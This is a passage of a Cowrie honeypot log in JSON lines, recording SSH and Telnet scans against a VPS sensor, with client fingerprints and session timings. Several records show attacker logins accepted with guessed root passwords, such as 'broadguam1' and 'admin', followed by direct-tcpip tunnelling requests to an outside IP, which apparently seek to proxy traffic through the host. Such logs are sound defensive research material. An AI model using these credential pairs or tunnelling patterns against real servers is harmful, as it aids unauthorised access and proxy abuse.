4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-08T12:09:58.901964Z","src_ip":"192.155.90.220","session":"7c555ccc70f2"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:09:59.480761Z","src_ip":"192.155.90.220","session":"7c555ccc70f2"}
{"eventid":"cowrie.session.connect","src_ip":"192.155.90.220","src_port":53334,"dst_ip":"1.2.3.4","dst_port":22,"session":"9bdfe55144c3","protocol":"ssh","message":"New connection: 192.155.90.220:53334 (1.2.3.4:22) [session: 9bdfe55144c3]","sensor":"my-vps","timestamp":"2025-09-08T12:09:59.580373Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:09:59.722890Z","src_ip":"192.155.90.220","session":"9bdfe55144c3"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-08T12:09:59.723621Z","src_ip":"192.155.90.220","session":"9bdfe55144c3"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:10:00.239383Z","src_ip":"192.155.90.220","session":"9bdfe55144c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8158,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0fb0b053fe3","protocol":"ssh","message":"New connection: 212.227.235.229:8158 (1.2.3.4:22) [session: e0fb0b053fe3]","sensor":"my-vps","timestamp":"2025-09-08T12:10:23.925961Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:10:24.119097Z","src_ip":"212.227.235.229","session":"e0fb0b053fe3"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-08T12:10:24.120068Z","src_ip":"212.227.235.229","session":"e0fb0b053fe3"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:10:24.913487Z","src_ip":"212.227.235.229","session":"e0fb0b053fe3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8166,"dst_ip":"1.2.3.4","dst_port":22,"session":"3afd97619f3e","protocol":"ssh","message":"New connection: 212.227.235.229:8166 (1.2.3.4:22) [session: 3afd97619f3e]","sensor":"my-vps","timestamp":"2025-09-08T12:10:25.103313Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:10:25.306811Z","src_ip":"212.227.235.229","session":"3afd97619f3e"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-08T12:10:25.307441Z","src_ip":"212.227.235.229","session":"3afd97619f3e"}
{"eventid":"cowrie.session.connect","src_ip":"172.236.228.111","src_port":61218,"dst_ip":"1.2.3.4","dst_port":22,"session":"96ae39d7e0ee","protocol":"ssh","message":"New connection: 172.236.228.111:61218 (1.2.3.4:22) [session: 96ae39d7e0ee]","sensor":"my-vps","timestamp":"2025-09-08T12:10:25.813980Z"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:10:26.120214Z","src_ip":"212.227.235.229","session":"3afd97619f3e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:10:26.176785Z","src_ip":"172.236.228.111","session":"96ae39d7e0ee"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-08T12:10:26.177915Z","src_ip":"172.236.228.111","session":"96ae39d7e0ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":8170,"dst_ip":"1.2.3.4","dst_port":22,"session":"99dd61c4db12","protocol":"ssh","message":"New connection: 212.227.235.229:8170 (1.2.3.4:22) [session: 99dd61c4db12]","sensor":"my-vps","timestamp":"2025-09-08T12:10:26.271787Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:10:26.501981Z","src_ip":"212.227.235.229","session":"99dd61c4db12"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-08T12:10:26.502625Z","src_ip":"212.227.235.229","session":"99dd61c4db12"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:10:27.106830Z","src_ip":"172.236.228.111","session":"96ae39d7e0ee"}
{"eventid":"cowrie.session.connect","src_ip":"172.236.228.111","src_port":61222,"dst_ip":"1.2.3.4","dst_port":22,"session":"0c45a9b94a01","protocol":"ssh","message":"New connection: 172.236.228.111:61222 (1.2.3.4:22) [session: 0c45a9b94a01]","sensor":"my-vps","timestamp":"2025-09-08T12:10:27.294732Z"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:10:27.328278Z","src_ip":"212.227.235.229","session":"99dd61c4db12"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:10:27.661864Z","src_ip":"172.236.228.111","session":"0c45a9b94a01"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-08T12:10:27.663167Z","src_ip":"172.236.228.111","session":"0c45a9b94a01"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:10:28.596332Z","src_ip":"172.236.228.111","session":"0c45a9b94a01"}
{"eventid":"cowrie.session.connect","src_ip":"172.236.228.111","src_port":61236,"dst_ip":"1.2.3.4","dst_port":22,"session":"81f05da53022","protocol":"ssh","message":"New connection: 172.236.228.111:61236 (1.2.3.4:22) [session: 81f05da53022]","sensor":"my-vps","timestamp":"2025-09-08T12:10:28.793414Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:10:29.131729Z","src_ip":"172.236.228.111","session":"81f05da53022"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-09-08T12:10:29.132649Z","src_ip":"172.236.228.111","session":"81f05da53022"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:10:30.193608Z","src_ip":"172.236.228.111","session":"81f05da53022"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:10:49.323583Z","src_ip":"212.227.235.229","session":"3494ca326e93"}
{"eventid":"cowrie.session.closed","duration":180.27641534805298,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:10:49.326548Z","src_ip":"212.227.235.229","session":"3494ca326e93"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.114.29","src_port":51824,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd5ed45733f5","protocol":"ssh","message":"New connection: 196.251.114.29:51824 (1.2.3.4:22) [session: cd5ed45733f5]","sensor":"my-vps","timestamp":"2025-09-08T12:11:50.311444Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:11:50.346319Z","src_ip":"196.251.114.29","session":"cd5ed45733f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42258,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d5ef80e4ef4","protocol":"ssh","message":"New connection: 212.227.125.160:42258 (1.2.3.4:22) [session: 3d5ef80e4ef4]","sensor":"my-vps","timestamp":"2025-09-08T12:11:54.529696Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:11:54.530782Z","src_ip":"212.227.125.160","session":"3d5ef80e4ef4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42544,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ce96fa23d1c","protocol":"ssh","message":"New connection: 212.227.125.160:42544 (1.2.3.4:22) [session: 1ce96fa23d1c]","sensor":"my-vps","timestamp":"2025-09-08T12:11:54.639489Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:11:54.640692Z","src_ip":"212.227.125.160","session":"1ce96fa23d1c"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T12:11:54.753852Z","src_ip":"212.227.125.160","session":"1ce96fa23d1c"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:11:55.091125Z","src_ip":"212.227.125.160","session":"1ce96fa23d1c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T12:11:55.203817Z","session":"1ce96fa23d1c"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:13:04.639122Z","src_ip":"212.227.125.160","session":"1ce96fa23d1c"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64548,"dst_ip":"1.2.3.4","dst_port":22,"session":"04e4a6d25003","protocol":"ssh","message":"New connection: 217.72.205.35:64548 (1.2.3.4:22) [session: 04e4a6d25003]","sensor":"my-vps","timestamp":"2025-09-08T12:14:09.381821Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:14:09.383079Z","src_ip":"217.72.205.35","session":"04e4a6d25003"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46000,"dst_ip":"1.2.3.4","dst_port":22,"session":"c5ac5a5ef54c","protocol":"ssh","message":"New connection: 212.227.125.160:46000 (1.2.3.4:22) [session: c5ac5a5ef54c]","sensor":"my-vps","timestamp":"2025-09-08T12:18:56.437986Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:18:56.670420Z","src_ip":"212.227.125.160","session":"c5ac5a5ef54c"}
{"eventid":"cowrie.session.connect","src_ip":"172.235.40.131","src_port":56072,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a08628b6815","protocol":"ssh","message":"New connection: 172.235.40.131:56072 (1.2.3.4:22) [session: 9a08628b6815]","sensor":"my-vps","timestamp":"2025-09-08T12:19:45.140065Z"}
{"eventid":"cowrie.client.version","version":"GET / HTTP/1.1","message":"Remote SSH version: GET / HTTP/1.1","sensor":"my-vps","timestamp":"2025-09-08T12:19:45.141227Z","src_ip":"172.235.40.131","session":"9a08628b6815"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:19:45.142413Z","src_ip":"172.235.40.131","session":"9a08628b6815"}
{"eventid":"cowrie.session.connect","src_ip":"172.235.40.131","src_port":56088,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3e65ed63113","protocol":"ssh","message":"New connection: 172.235.40.131:56088 (1.2.3.4:22) [session: d3e65ed63113]","sensor":"my-vps","timestamp":"2025-09-08T12:19:45.466548Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\\xa2\\x9e'\\x95\\xea%\\x97\u0016\u00072\\xf3s\u0007\\xe3\\x92\u067e\\x9d\\xd2=\\x84\\xfe\\xfa\\x8d\\x92Y\\xc6\\xc0\\xa2\\x8dO\\xb4\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003\\xa2\\x9e'\\x95\\xea%\\x97\u0016\u00072\\xf3s\u0007\\xe3\\x92\u067e\\x9d\\xd2=\\x84\\xfe\\xfa\\x8d\\x92Y\\xc6\\xc0\\xa2\\x8dO\\xb4\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","sensor":"my-vps","timestamp":"2025-09-08T12:19:45.467817Z","src_ip":"172.235.40.131","session":"d3e65ed63113"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:19:45.468868Z","src_ip":"172.235.40.131","session":"d3e65ed63113"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46177,"dst_ip":"1.2.3.4","dst_port":23,"session":"689e2a984992","protocol":"telnet","message":"New connection: 212.227.125.160:46177 (1.2.3.4:23) [session: 689e2a984992]","sensor":"my-vps","timestamp":"2025-09-08T12:20:26.152894Z"}
{"eventid":"cowrie.session.closed","duration":12.975717782974243,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:20:39.128541Z","src_ip":"212.227.125.160","session":"689e2a984992"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":58398,"dst_ip":"1.2.3.4","dst_port":22,"session":"f818e1977b89","protocol":"ssh","message":"New connection: 217.72.205.35:58398 (1.2.3.4:22) [session: f818e1977b89]","sensor":"my-vps","timestamp":"2025-09-08T12:20:42.226898Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:20:42.227992Z","src_ip":"217.72.205.35","session":"f818e1977b89"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":40456,"dst_ip":"1.2.3.4","dst_port":23,"session":"1592f3cea789","protocol":"telnet","message":"New connection: 79.124.8.120:40456 (1.2.3.4:23) [session: 1592f3cea789]","sensor":"my-vps","timestamp":"2025-09-08T12:24:39.528068Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:24:39.567667Z","src_ip":"79.124.8.120","session":"1592f3cea789"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T12:24:39.605328Z","src_ip":"79.124.8.120","session":"1592f3cea789"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44215,"dst_ip":"1.2.3.4","dst_port":22,"session":"4910fd35dc89","protocol":"ssh","message":"New connection: 212.227.235.229:44215 (1.2.3.4:22) [session: 4910fd35dc89]","sensor":"my-vps","timestamp":"2025-09-08T12:27:11.686049Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:27:11.687726Z","src_ip":"212.227.235.229","session":"4910fd35dc89"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44573,"dst_ip":"1.2.3.4","dst_port":22,"session":"789abc831fb8","protocol":"ssh","message":"New connection: 212.227.235.229:44573 (1.2.3.4:22) [session: 789abc831fb8]","sensor":"my-vps","timestamp":"2025-09-08T12:27:11.786856Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T12:27:11.787795Z","src_ip":"212.227.235.229","session":"789abc831fb8"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T12:27:11.916029Z","src_ip":"212.227.235.229","session":"789abc831fb8"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:27:12.304605Z","src_ip":"212.227.235.229","session":"789abc831fb8"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T12:27:12.434297Z","session":"789abc831fb8"}
